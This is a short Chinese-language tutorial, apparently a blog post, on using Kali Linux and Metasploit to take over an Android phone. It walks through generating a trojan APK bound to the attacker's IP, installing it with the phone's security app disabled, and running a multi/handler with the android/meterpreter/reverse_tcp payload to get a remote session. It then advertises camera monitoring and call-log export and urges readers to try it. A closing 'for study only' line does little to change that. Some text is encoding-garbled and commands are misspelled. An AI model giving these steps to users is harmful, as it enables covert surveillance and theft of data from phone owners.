Metasploit是一款開源的安全漏洞檢測工具,可以幫助安全和IT專業(yè)人士識別安全性問題,驗(yàn)證漏洞的緩解措施,并管理專家驅(qū)動的安全性進(jìn)行評估,提供真正的安全風(fēng)險情報
今天給大家?guī)韐ali簡單入侵安卓手機(jī),話不多說我們開始吧!首先打開kali,在終端輸入ifconfig 查看一下ip
然后利用Metasploit工具生成木馬這里輸入的是kali的ip和監(jiān)聽端口(最好不是已占用的端口)生成木馬的路徑及木馬名這里我取apk.apk
查看生成的木馬然后把它安裝到手機(jī)上(360等安全軟件要先關(guān)閉)
進(jìn)入左選項(xiàng)欄點(diǎn)擊Metasploit圖標(biāo) 或者在終端輸入Metasploit
啟動metasploit
依次執(zhí)行輸入msfconfig
use exploit/multi/handler 加載攻擊模塊
set payload android/meterpreter/reverse_tcp 選擇要使用的Payload
set LHOST 目標(biāo)ip
set LPORT 5555 監(jiān)聽端口
exploit攻擊
輸入sysinto查看手機(jī)版本信息入侵成功!
不光可以查看手機(jī)版本信息還可以監(jiān)控攝像頭、導(dǎo)出通話記錄等功能,如果有興趣的話就去試一下吧!
注:本實(shí)驗(yàn)僅供學(xué)習(xí)交流請勿用于非法用途!
你可能喜歡